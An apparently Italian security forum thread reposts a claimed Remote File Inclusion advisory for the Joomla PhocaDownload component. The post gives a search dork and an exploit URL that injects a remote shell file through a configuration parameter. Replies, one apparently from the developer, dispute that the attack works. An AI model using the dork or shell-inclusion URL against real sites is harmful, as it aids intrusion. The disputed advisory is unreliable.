Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability

[jeckodevelopment]

Joomla Component PhocaDownload - com_phocadownload RFI Vulnerability
Non si hanno ancora maggiori informazioni riguardo la presunta vulnerabilità di tipo RFI (Remote File Inclusion) del componente PhocaDownload, si consiglia di visitare spesso il sito dello sviluppatore del componente e verificare la presenza di eventuali aggiornamenti.

Codice: [Seleziona]

=========================================================

Joomla Component Phocadownload RFI Vulnerability

=========================================================
Title : Joomla Component phocadownload RFI Vulnerability
Software : Phocadownload
Vendor : http://www.phoca.cz/
Download :
http://www.phoca.cz/download/category/4-phoca-download-component

###########################################
Dork : inurl:index.php?option="com_phocadownload"
-----------------------------------------------------------------------
RFI Exploit

Exploit :

http://example.com/components/com_phocadownload/phocadownload.php?mosConfig
_absolute_path=[ Shell txt ]



[H13]

Hi, Phoca Download does not work with the variable: mosConfig
_absolute_path

Mostly Joomla! itself doesn't allow to access directly the file.

Exactly:
phocadownload.php is protected by:
defined( '_JEXEC' ) or die( 'Restricted access' );

so you get "Restricted access", nothing more.

Jan

[mau_develop]

yeah! ... of course... like other without a short poc or disclosure.... only kiddie and obsolete advisory service

thanks for your post and script

bye

M.